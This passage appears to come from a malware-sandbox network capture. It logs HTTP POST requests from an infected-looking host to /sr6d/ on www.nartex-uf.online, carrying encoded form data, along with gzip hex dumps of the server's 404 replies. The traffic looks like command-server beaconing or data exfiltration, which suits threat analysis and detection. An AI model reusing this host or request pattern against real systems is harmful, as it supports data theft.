                                                                                Nov 25, 2024 12:01:29.365418911 CET1289INData Raw: cd 3f a8 21 9d e1 c6 33 18 d1 11 fe e7 36 a0 1b f6 46 d2 fc 83 1a ce 19 6e 3c bd d1 1c a3 7f 5e 83 b9 61 5f c4 8d 3f a4 a1 9c 65 c5 d3 1b c9 80 3f 31 90 a3 12 e4 38 e2 95 e5 e0 d9 de e8 6c f4 62 b1 c8 3d 07 33 da 8d 8f 4e 5f 0f 67 c2 ac b4 c4 d5
                                                                                Data Ascii: ?!36Fn<^a_?e?18lb=3N_g>$g!\k$gTi<G,5\i]r#tQ\-uomv`5S2Wk]x$@{O!__yk%tJcZ {N!b\4T
                                                                                Nov 25, 2024 12:01:29.365454912 CET1289INData Raw: 03 bb 10 05 a2 9e d1 7b d8 49 1c 9b e3 90 26 e9 99 7c 86 9d 94 34 73 17 0a 14 3d b9 a7 50 4a 10 bb 93 b0 93 1f 4c fe 41 9a 0d cf eb 1a 14 5a f2 6c 5e c1 4e ce 32 da e1 69 8a 9e cb 17 d8 49 4b 43 37 a0 48 d3 f3 79 00 bb 15 37 a3 f1 9f 21 ea b9 ec
                                                                                Data Ascii: {I&|4s=PJLAZl^N2iIKC7Hy7!=7T=":M5D.P}))&{>g6my6+~)fI%iz}&]I_ MiII3@;d/Le4=I&}3w+nF>C
                                                                                Nov 25, 2024 12:01:29.365617990 CET1289INData Raw: ee 7a 30 33 bc 72 96 7f 57 55 2d 58 6e 56 d7 7e b5 3c fc 69 47 c5 cd ba b4 da bb aa 6a 9b 35 ce 0a a5 75 be af aa f3 bb 0b de 5b 49 0d 51 e8 7e ae 73 6f ed df 67 63 b9 96 cf df b9 df 5f b6 d1 4a ec d5 ec 34 97 9d c5 52 2e 76 7a ce 12 f2 f3 9a e5
                                                                                Data Ascii: z03rWU-XnV~<iGj5u[IQ~sogc_J4R.vzX80i}w-iR?3RinNj<P@8#3/0J5b_N}<Sl;'QmhHffeziblr 8Jonzs)F6e0HJ\A
                                                                                Nov 25, 2024 12:01:29.365720034 CET1289INData Raw: ad 08 ff 90 e6 5a 1a fa 73 9a 6b 95 bd 74 18 73 ed 78 9d 54 01 fe 80 e6 1a 4b 17 1d df 5c 5b cd 99 cc b5 4c 3f 1e d5 5c 63 ec d2 03 98 6b 2c bd db c6 6c 01 9e ed 61 ae 1d 9b fe a7 a0 fb 93 31 d7 32 62 7b 14 73 8d ad bb f6 37 d7 58 3a ab 85 b9 56
                                                                                Data Ascii: ZsktsxTK\[L?\ck,la12b{s7X:VkO%Ck\;o2[M,j@njle*{0:5.:f0k~<Xzoh2b{{X:VkO%Ck^;o7vKl}
                                                                                Nov 25, 2024 12:01:29.365978956 CET1289INData Raw: 91 15 91 65 4f 83 63 75 0b 6a 51 ae eb 3c 84 70 98 55 c5 04 93 72 e1 2c 52 15 00 24 05 81 8d 05 6a f2 bd 75 6d ed 2e 83 ef 6b da 59 88 be 70 69 67 31 6c fc ce 42 c9 8b 8b f6 ed 0d da 9a 87 2a 69 60 ea 0f 60 5f 09 b7 ca 98 53 ce 8b 6a aa 8e 3f 3c
                                                                                Data Ascii: eOcujQ<pUr,R$jum.kYpig1lB*i``_Sj?<RA9+nKk>7Tof[R}\{Z^d6o%=Y7Y"{T%L|M_xsBfi[M7!Ro.wUf\KfQZ:W4GyKpYIDVdEyoe!
                                                                                Nov 25, 2024 12:01:29.366012096 CET1289INData Raw: 64 15 f8 37 e6 35 10 01 94 3b 51 a6 3f 80 2e 6c 3e 3f 04 39 95 86 38 6c 47 43 68 10 0c 67 00 a1 0c 90 6e 90 5e 81 b0 0b db 32 06 11 1b f3 23 2d fc 61 80 d0 8c 50 14 e9 17 ca 2a b4 55 96 51 f4 24 90 6a f8 a1 d0 0f 22 c6 fc 10 95 82 24 03 1f 04 c2
                                                                                Data Ascii: d75;Q?.l>?98lGChgn^2#-aP*UQ$j"$5Fz[EKPAFd(Z"je4hPFR0EHQ~THP#BaLQ!J~x|"?j4:Tx=<fu(Q:b<!T
                                                                                Nov 25, 2024 12:01:29.366092920 CET1289INData Raw: f0 f1 b2 58 2b a4 ef 36 5f 25 4f b8 44 08 17 47 3b 29 1f 85 9f 39 ca e5 72 b6 50 ea 64 66 ca d5 3a ca 47 95 5d be 83 f2 b2 2e 1f 35 a6 fc d9 fb bc 46 d8 4b 28 df 2d ec 9f 43 9f 3f b3 b4 7f 39 7d 5e d4 fb 91 7a be 61 d4 cd aa 08 a6 28 86 eb 86 02
                                                                                Data Ascii: X+6_%ODG;)9rPdf:G].5FK(-C?9}^za(X|//%cU;Fc0X|S:#/ADJF2E55HFp]"'3{/{YiDLhC@P3IKKnLSJ(or>6+Jb'hgJ6
                                                                                Nov 25, 2024 12:01:29.366164923 CET1289INData Raw: a1 01 f4 33 92 eb a2 58 cb 89 54 6b fb 0a 75 ae d3 f3 f6 4e a9 48 6b ac 12 5d 26 d0 4f 27 cf a1 2d 27 2a 82 42 8e ec 57 08 f4 a8 8d 40 0f 8f 2f d0 f2 98 4a 34 38 6d 20 5d 44 5c a0 b9 c4 c2 19 8d 88 32 87 bb a1 2a 8f 35 79 4a 91 ef 29 e9 a1 12 4f
                                                                                Data Ascii: 3XTkuNHk]&O'-'*BW@/J48m ]D\2*5yJ)OF9Wv&('bO]c^@e0q7<eD-^QA3]c^8ZU3OHC=|LG!,@S%Ux0P-IS-c:S@p$Ee
                                                                                Nov 25, 2024 12:01:29.578191042 CET1289INData Raw: d2 bb e5 02 1c 4e 19 42 11 48 4e 84 f3 40 d2 32 1c 02 29 6d 4b 5e 8a f3 70 32 62 1c 02 ca c9 5f 4c 55 4e 92 8b 74 a5 45 39 84 95 93 9d 10 56 41 98 f3 b0 b2 d2 1c c2 92 4b 29 cc 8b 61 1e 54 46 0a a3 29 7a 54 06 a9 28 d2 79 58 39 99 0e a1 0d 4b f9
                                                                                Data Ascii: NBHN@2)mK^p2b_LUNtE9VAK)aTF)zT(yX9K<XP;&-qeTN=^ld9VOK5.%:!#VFBND Y(YPFE(y!tIQpPrbK9+dE6#%~_sUA-iA^J 22J`GoaF


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                60192.168.11.204980331.31.196.17780
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:01:31.878174067 CET750OUTPOST /sr6d/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nartex-uf.online
                                                                                Origin: http://www.nartex-uf.online
                                                                                Referer: http://www.nartex-uf.online/sr6d/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 34 51 42 73 48 70 48 77 45 39 4b 4a 68 78 59 76 6c 33 2f 77 66 44 52 46 54 30 48 6c 46 72 75 4f 73 74 51 64 55 59 71 67 2f 33 36 4f 50 78 72 4e 35 67 50 55 37 70 67 43 2f 5a 71 71 41 4a 38 48 4d 42 4a 71 48 2b 67 36 65 74 4c 32 69 67 41 34 66 53 78 44 53 53 35 66 76 78 51 4c 39 37 64 56 4d 64 79 48 50 66 7a 64 4a 2f 33 47 69 72 6f 2f 6a 77 4c 33 4d 67 64 37 45 78 64 6f 78 35 6c 56 46 54 5a 76 68 79 59 6c 37 4f 32 49 6f 34 38 51 5a 4e 49 55 68 34 67 62 63 72 4c 42 34 48 6f 6f 50 42 34 6b 37 65 79 45 6f 77 65 6b 75 31 7a 79 6f 78 31 41 58 43 67 42 44 4d 59 51 39 59 6f 4d 2b 43 50 47 50 61 4b 4e 37 6e 58 4e 51 54 59 6c 77 52 64 56 52 43 67 3d
                                                                                Data Ascii: 2WLcH=4QBsHpHwE9KJhxYvl3/wfDRFT0HlFruOstQdUYqg/36OPxrN5gPU7pgC/ZqqAJ8HMBJqH+g6etL2igA4fSxDSS5fvxQL97dVMdyHPfzdJ/3Giro/jwL3Mgd7Exdox5lVFTZvhyYl7O2Io48QZNIUh4gbcrLB4HooPB4k7eyEoweku1zyox1AXCgBDMYQ9YoM+CPGPaKN7nXNQTYlwRdVRCg=
                                                                                Nov 25, 2024 12:01:32.128256083 CET1289INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:01:32 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 [TRUNCATED]
                                                                                Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrvc_~`97gpt}23[oz~0wce[[^]'0(ug>7o9 ?8M]k7SrG(Xm??S??m2w=| w3W+wMnla~>]7o|B<U],/rsf:&n*lwOz>m~S-LfY9S2& |=]YYKYa4NcGXD)tCe"JPG3oLbzm>xOeXLw+zExPomx0:u&w"^W{78YZl@a-HC]f|= ul)\x*ht6,k^e`Lvk@eps L5h&kq?;[,LUiL6%Im"E5]c_0wZTvk,D#eMm/POD&p^IVjRUBCIHr]AuHw^Ch"#<,vE+4>R-Ou91rQ [TRUNCATED]
                                                                                Nov 25, 2024 12:01:32.128290892 CET1289INData Raw: 03 c2 95 01 82 a7 02 bf 8b f0 18 7c 6c 86 c4 36 5d 67 20 aa 14 74 63 72 d9 a0 16 89 4c 86 63 ce 08 4d e0 24 76 61 68 fc fd cb 42 5a 28 8b 31 33 a5 25 38 a8 d8 ed 4b 64 25 c0 12 fa 88 ff 07 0a dc 35 82 09 ca 26 b5 94 87 82 d0 41 32 cf 64 a1 8d c9
                                                                                Data Ascii: |l6]g tcrLcM$vahBZ(13%8Kd%5&A2dl[:J,A<~,1Y.0=D]U9FTTs5L@O)fG:RvWaIEzUe9ZuWY$n>Mo5XOJV3Dm<ZPW4C+
                                                                                Nov 25, 2024 12:01:32.128318071 CET1289INData Raw: cd 3f a8 21 9d e1 c6 33 18 d1 11 fe e7 36 a0 1b f6 46 d2 fc 83 1a ce 19 6e 3c bd d1 1c a3 7f 5e 83 b9 61 5f c4 8d 3f a4 a1 9c 65 c5 d3 1b c9 80 3f 31 90 a3 12 e4 38 e2 95 e5 e0 d9 de e8 6c f4 62 b1 c8 3d 07 33 da 8d 8f 4e 5f 0f 67 c2 ac b4 c4 d5
                                                                                Data Ascii: ?!36Fn<^a_?e?18lb=3N_g>$g!\k$gTi<G,5\i]r#tQ\-uomv`5S2Wk]x$@{O!__yk%tJcZ {N!b\4T
                                                                                Nov 25, 2024 12:01:32.128412008 CET1289INData Raw: 03 bb 10 05 a2 9e d1 7b d8 49 1c 9b e3 90 26 e9 99 7c 86 9d 94 34 73 17 0a 14 3d b9 a7 50 4a 10 bb 93 b0 93 1f 4c fe 41 9a 0d cf eb 1a 14 5a f2 6c 5e c1 4e ce 32 da e1 69 8a 9e cb 17 d8 49 4b 43 37 a0 48 d3 f3 79 00 bb 15 37 a3 f1 9f 21 ea b9 ec
                                                                                Data Ascii: {I&|4s=PJLAZl^N2iIKC7Hy7!=7T=":M5D.P}))&{>g6my6+~)fI%iz}&]I_ MiII3@;d/Le4=I&}3w+nF>C
                                                                                Nov 25, 2024 12:01:32.128561020 CET1289INData Raw: ee 7a 30 33 bc 72 96 7f 57 55 2d 58 6e 56 d7 7e b5 3c fc 69 47 c5 cd ba b4 da bb aa 6a 9b 35 ce 0a a5 75 be af aa f3 bb 0b de 5b 49 0d 51 e8 7e ae 73 6f ed df 67 63 b9 96 cf df b9 df 5f b6 d1 4a ec d5 ec 34 97 9d c5 52 2e 76 7a ce 12 f2 f3 9a e5
                                                                                Data Ascii: z03rWU-XnV~<iGj5u[IQ~sogc_J4R.vzX80i}w-iR?3RinNj<P@8#3/0J5b_N}<Sl;'QmhHffeziblr 8Jonzs)F6e0HJ\A
                                                                                Nov 25, 2024 12:01:32.128662109 CET1289INData Raw: ad 08 ff 90 e6 5a 1a fa 73 9a 6b 95 bd 74 18 73 ed 78 9d 54 01 fe 80 e6 1a 4b 17 1d df 5c 5b cd 99 cc b5 4c 3f 1e d5 5c 63 ec d2 03 98 6b 2c bd db c6 6c 01 9e ed 61 ae 1d 9b fe a7 a0 fb 93 31 d7 32 62 7b 14 73 8d ad bb f6 37 d7 58 3a ab 85 b9 56
                                                                                Data Ascii: ZsktsxTK\[L?\ck,la12b{s7X:VkO%Ck\;o2[M,j@njle*{0:5.:f0k~<Xzoh2b{{X:VkO%Ck^;o7vKl}
                                                                                Nov 25, 2024 12:01:32.128691912 CET1289INData Raw: 91 15 91 65 4f 83 63 75 0b 6a 51 ae eb 3c 84 70 98 55 c5 04 93 72 e1 2c 52 15 00 24 05 81 8d 05 6a f2 bd 75 6d ed 2e 83 ef 6b da 59 88 be 70 69 67 31 6c fc ce 42 c9 8b 8b f6 ed 0d da 9a 87 2a 69 60 ea 0f 60 5f 09 b7 ca 98 53 ce 8b 6a aa 8e 3f 3c
                                                                                Data Ascii: eOcujQ<pUr,R$jum.kYpig1lB*i``_Sj?<RA9+nKk>7Tof[R}\{Z^d6o%=Y7Y"{T%L|M_xsBfi[M7!Ro.wUf\KfQZ:W4GyKpYIDVdEyoe!
                                                                                Nov 25, 2024 12:01:32.128763914 CET1289INData Raw: 64 15 f8 37 e6 35 10 01 94 3b 51 a6 3f 80 2e 6c 3e 3f 04 39 95 86 38 6c 47 43 68 10 0c 67 00 a1 0c 90 6e 90 5e 81 b0 0b db 32 06 11 1b f3 23 2d fc 61 80 d0 8c 50 14 e9 17 ca 2a b4 55 96 51 f4 24 90 6a f8 a1 d0 0f 22 c6 fc 10 95 82 24 03 1f 04 c2
                                                                                Data Ascii: d75;Q?.l>?98lGChgn^2#-aP*UQ$j"$5Fz[EKPAFd(Z"je4hPFR0EHQ~THP#BaLQ!J~x|"?j4:Tx=<fu(Q:b<!T
                                                                                Nov 25, 2024 12:01:32.128979921 CET1289INData Raw: f0 f1 b2 58 2b a4 ef 36 5f 25 4f b8 44 08 17 47 3b 29 1f 85 9f 39 ca e5 72 b6 50 ea 64 66 ca d5 3a ca 47 95 5d be 83 f2 b2 2e 1f 35 a6 fc d9 fb bc 46 d8 4b 28 df 2d ec 9f 43 9f 3f b3 b4 7f 39 7d 5e d4 fb 91 7a be 61 d4 cd aa 08 a6 28 86 eb 86 02
                                                                                Data Ascii: X+6_%ODG;)9rPdf:G].5FK(-C?9}^za(X|//%cU;Fc0X|S:#/ADJF2E55HFp]"'3{/{YiDLhC@P3IKKnLSJ(or>6+Jb'hgJ6
                                                                                Nov 25, 2024 12:01:32.129014015 CET1289INData Raw: a1 01 f4 33 92 eb a2 58 cb 89 54 6b fb 0a 75 ae d3 f3 f6 4e a9 48 6b ac 12 5d 26 d0 4f 27 cf a1 2d 27 2a 82 42 8e ec 57 08 f4 a8 8d 40 0f 8f 2f d0 f2 98 4a 34 38 6d 20 5d 44 5c a0 b9 c4 c2 19 8d 88 32 87 bb a1 2a 8f 35 79 4a 91 ef 29 e9 a1 12 4f
                                                                                Data Ascii: 3XTkuNHk]&O'-'*BW@/J48m ]D\2*5yJ)OF9Wv&('bO]c^@e0q7<eD-^QA3]c^8ZU3OHC=|LG!,@S%Ux0P-IS-c:S@p$Ee
                                                                                Nov 25, 2024 12:01:32.347213030 CET1289INData Raw: d2 bb e5 02 1c 4e 19 42 11 48 4e 84 f3 40 d2 32 1c 02 29 6d 4b 5e 8a f3 70 32 62 1c 02 ca c9 5f 4c 55 4e 92 8b 74 a5 45 39 84 95 93 9d 10 56 41 98 f3 b0 b2 d2 1c c2 92 4b 29 cc 8b 61 1e 54 46 0a a3 29 7a 54 06 a9 28 d2 79 58 39 99 0e a1 0d 4b f9
                                                                                Data Ascii: NBHN@2)mK^p2b_LUNtE9VAK)aTF)zT(yX9K<XP;&-qeTN=^ld9VOK5.%:!#VFBND Y(YPFE(y!tIQpPrbK9+dE6#%~_sUA-iA^J 22J`GoaF


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                61192.168.11.204980431.31.196.17780
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 25, 2024 12:01:34.622042894 CET2578OUTPOST /sr6d/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nartex-uf.online
                                                                                Origin: http://www.nartex-uf.online
                                                                                Referer: http://www.nartex-uf.online/sr6d/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Raw: 32 57 4c 63 48 3d 34 51 42 73 48 70 48 77 45 39 4b 4a 68 78 59 76 6c 33 2f 77 66 44 52 46 54 30 48 6c 46 72 75 4f 73 74 51 64 55 59 71 67 2f 33 79 4f 50 67 4c 4e 37 48 37 55 36 70 67 43 33 35 71 70 41 4a 38 67 4d 42 51 68 48 2b 73 45 65 75 7a 32 69 44 49 34 61 6d 64 44 4c 43 35 66 6e 52 51 47 67 72 63 50 4d 64 6a 4f 50 66 6a 64 4a 2f 33 47 69 74 45 2f 6b 68 4c 33 42 41 64 30 54 42 64 30 31 35 6c 70 46 54 42 5a 68 79 63 50 38 34 47 49 76 63 51 51 62 37 38 55 70 34 67 5a 66 72 4b 45 34 48 6b 33 50 42 55 65 37 64 75 75 6f 33 36 6b 69 55 71 77 30 46 68 33 46 41 67 51 43 2b 63 32 2b 2b 39 61 67 67 54 53 4a 72 76 68 30 43 53 64 61 6a 49 50 72 77 4d 4b 50 6d 48 71 55 2f 36 39 56 55 75 50 6a 77 59 6a 31 6c 77 33 58 6c 6a 39 71 57 65 76 76 6d 76 5a 42 71 74 41 37 76 55 2b 67 4f 54 59 47 4e 46 52 65 32 4e 6d 47 42 32 56 78 46 76 36 51 73 31 56 77 44 76 67 57 36 55 6e 6d 72 59 79 79 53 6e 6c 46 62 35 45 6a 39 70 6f 45 78 41 41 61 6d 61 71 63 7a 6e 64 36 49 50 32 4e 55 74 74 30 42 71 62 48 74 68 64 69 6f 6c 79 [TRUNCATED]
                                                                                Data Ascii: 2WLcH=4QBsHpHwE9KJhxYvl3/wfDRFT0HlFruOstQdUYqg/3yOPgLN7H7U6pgC35qpAJ8gMBQhH+sEeuz2iDI4amdDLC5fnRQGgrcPMdjOPfjdJ/3GitE/khL3BAd0TBd015lpFTBZhycP84GIvcQQb78Up4gZfrKE4Hk3PBUe7duuo36kiUqw0Fh3FAgQC+c2++9aggTSJrvh0CSdajIPrwMKPmHqU/69VUuPjwYj1lw3Xlj9qWevvmvZBqtA7vU+gOTYGNFRe2NmGB2VxFv6Qs1VwDvgW6UnmrYyySnlFb5Ej9poExAAamaqcznd6IP2NUtt0BqbHthdiolypGWXeNhAyAvN4Y4Qen0hFnGDll3tsFtdtLgY0t+mh/sVc4v06/Wve2fIAQ7XG4vBZfRuWpm4emn/gK2CXW38k9uJQ/Qhx+Y0nOKSgt65avdU33gdE5fttQnLuV0S/BFuA3lLHD4+13T0NGh8kUu8gYPljYCAbrtSqZkK7AvohdbqekbCZGHOaV/On9psjOkHK1Nkr5c7owJ7cI92C74TY7Pk831Sxrt514CysI1w5f1qJxknIsK74aE7LE+K7vYowq/Z/dNyzkQ/BAV3HRbXbUyMzmPn0C7hmoPJu392t4H2z4O6qzN9+nBTD8bPa3THJMXxY5PyrUQf5WYqAYAA9nUrUrr6+2gG/0ef7++uBadN/mHWDf3RSOZKsuHe4kedx6ReHolf4Yd7TTqdkk/CNgCjgpJBQqq/Sj33FrOItRRN9MFNn6wpUCozBz7WeX6fOIx41iKY8xFXGcjc/Whf1QYIzI2SP40npSUqiMoHVVKpcGK3/Bnevh8HSfnhWUSLcjC3ZO2W3J7a4IcJP/m8DV45tk1pSpyqgSR6F446ADuRSIWA4W0k9UKgTm0u2AvTHdKQadtbSjgnsBK0G5pdlqS1kiN/QTxxjwp0RidRIUK3lMPK0+r6R+stIFMC4dmiI0A0nBoCu+oGhMlpPPRoOnG0FbQsqrgJ+O [TRUNCATED]
                                                                                Nov 25, 2024 12:01:34.622123003 CET5321OUTData Raw: 56 43 50 58 4c 68 69 6f 64 2f 41 6d 73 4a 67 49 70 74 35 43 66 76 6b 4e 4a 70 54 6f 55 69 2f 6d 6c 6b 6e 33 75 37 68 61 56 35 4c 68 7a 56 2f 33 55 2b 2f 57 32 57 72 58 54 79 79 54 55 77 30 44 55 66 52 33 55 70 32 77 5a 38 66 36 7a 54 7a 6c 2f 4d
                                                                                Data Ascii: VCPXLhiod/AmsJgIpt5CfvkNJpToUi/mlkn3u7haV5LhzV/3U+/W2WrXTyyTUw0DUfR3Up2wZ8f6zTzl/M92eJQd3IXj+QigjkLgh6J1FCXL9d6aia9RDPf7Zna6K1hJXR3ZYSVjza2Yo/xlC/pV9NQA3AkMQ/coVfBGo+95uWaZazxvhSzmDi+M1520r8dnd5YuBDbIaUnMh8LbLpP5uPYo6J//AMROGtwL0MABhCrgYN6zi4F
                                                                                Nov 25, 2024 12:01:34.872262955 CET1289INHTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 11:01:34 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 [TRUNCATED]
                                                                                Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrvc_~`97gpt}23[oz~0wce[[^]'0(ug>7o9 ?8M]k7SrG(Xm??S??m2w=| w3W+wMnla~>]7o|B<U],/rsf:&n*lwOz>m~S-LfY9S2& |=]YYKYa4NcGXD)tCe"JPG3oLbzm>xOeXLw+zExPomx0:u&w"^W{78YZl@a-HC]f|= ul)\x*ht6,k^e`Lvk@eps L5h&kq?;[,LUiL6%Im"E5]c_0wZTvk,D#eMm/POD&p^IVjRUBCIHr]AuHw^Ch"#<,vE+4>R-Ou91rQ [TRUNCATED]
                                                                                Nov 25, 2024 12:01:34.872380018 CET1289INData Raw: 03 c2 95 01 82 a7 02 bf 8b f0 18 7c 6c 86 c4 36 5d 67 20 aa 14 74 63 72 d9 a0 16 89 4c 86 63 ce 08 4d e0 24 76 61 68 fc fd cb 42 5a 28 8b 31 33 a5 25 38 a8 d8 ed 4b 64 25 c0 12 fa 88 ff 07 0a dc 35 82 09 ca 26 b5 94 87 82 d0 41 32 cf 64 a1 8d c9
                                                                                Data Ascii: |l6]g tcrLcM$vahBZ(13%8Kd%5&A2dl[:J,A<~,1Y.0=D]U9FTTs5L@O)fG:RvWaIEzUe9ZuWY$n>Mo5XOJV3Dm<ZPW4C+
                                                                                Nov 25, 2024 12:01:34.872390032 CET1289INData Raw: cd 3f a8 21 9d e1 c6 33 18 d1 11 fe e7 36 a0 1b f6 46 d2 fc 83 1a ce 19 6e 3c bd d1 1c a3 7f 5e 83 b9 61 5f c4 8d 3f a4 a1 9c 65 c5 d3 1b c9 80 3f 31 90 a3 12 e4 38 e2 95 e5 e0 d9 de e8 6c f4 62 b1 c8 3d 07 33 da 8d 8f 4e 5f 0f 67 c2 ac b4 c4 d5
                                                                                Data Ascii: ?!36Fn<^a_?e?18lb=3N_g>$g!\k$gTi<G,5\i]r#tQ\-uomv`5S2Wk]x$@{O!__yk%tJcZ {N!b\4T
                                                                                Nov 25, 2024 12:01:34.872493029 CET1289INData Raw: 03 bb 10 05 a2 9e d1 7b d8 49 1c 9b e3 90 26 e9 99 7c 86 9d 94 34 73 17 0a 14 3d b9 a7 50 4a 10 bb 93 b0 93 1f 4c fe 41 9a 0d cf eb 1a 14 5a f2 6c 5e c1 4e ce 32 da e1 69 8a 9e cb 17 d8 49 4b 43 37 a0 48 d3 f3 79 00 bb 15 37 a3 f1 9f 21 ea b9 ec
                                                                                Data Ascii: {I&|4s=PJLAZl^N2iIKC7Hy7!=7T=":M5D.P}))&{>g6my6+~)fI%iz}&]I_ MiII3@;d/Le4=I&}3w+nF>C
                                                                                Nov 25, 2024 12:01:34.872710943 CET1289INData Raw: ee 7a 30 33 bc 72 96 7f 57 55 2d 58 6e 56 d7 7e b5 3c fc 69 47 c5 cd ba b4 da bb aa 6a 9b 35 ce 0a a5 75 be af aa f3 bb 0b de 5b 49 0d 51 e8 7e ae 73 6f ed df 67 63 b9 96 cf df b9 df 5f b6 d1 4a ec d5 ec 34 97 9d c5 52 2e 76 7a ce 12 f2 f3 9a e5
                                                                                Data Ascii: z03rWU-XnV~<iGj5u[IQ~sogc_J4R.vzX80i}w-iR?3RinNj<P@8#3/0J5b_N}<Sl;'QmhHffeziblr 8Jonzs)F6e0HJ\A
                                                                                Nov 25, 2024 12:01:34.872781992 CET1289INData Raw: ad 08 ff 90 e6 5a 1a fa 73 9a 6b 95 bd 74 18 73 ed 78 9d 54 01 fe 80 e6 1a 4b 17 1d df 5c 5b cd 99 cc b5 4c 3f 1e d5 5c 63 ec d2 03 98 6b 2c bd db c6 6c 01 9e ed 61 ae 1d 9b fe a7 a0 fb 93 31 d7 32 62 7b 14 73 8d ad bb f6 37 d7 58 3a ab 85 b9 56
                                                                                Data Ascii: ZsktsxTK\[L?\ck,la12b{s7X:VkO%Ck\;o2[M,j@njle*{0:5.:f0k~<Xzoh2b{{X:VkO%Ck^;o7vKl}
                                                                                Nov 25, 2024 12:01:34.872951984 CET1289INData Raw: 91 15 91 65 4f 83 63 75 0b 6a 51 ae eb 3c 84 70 98 55 c5 04 93 72 e1 2c 52 15 00 24 05 81 8d 05 6a f2 bd 75 6d ed 2e 83 ef 6b da 59 88 be 70 69 67 31 6c fc ce 42 c9 8b 8b f6 ed 0d da 9a 87 2a 69 60 ea 0f 60 5f 09 b7 ca 98 53 ce 8b 6a aa 8e 3f 3c
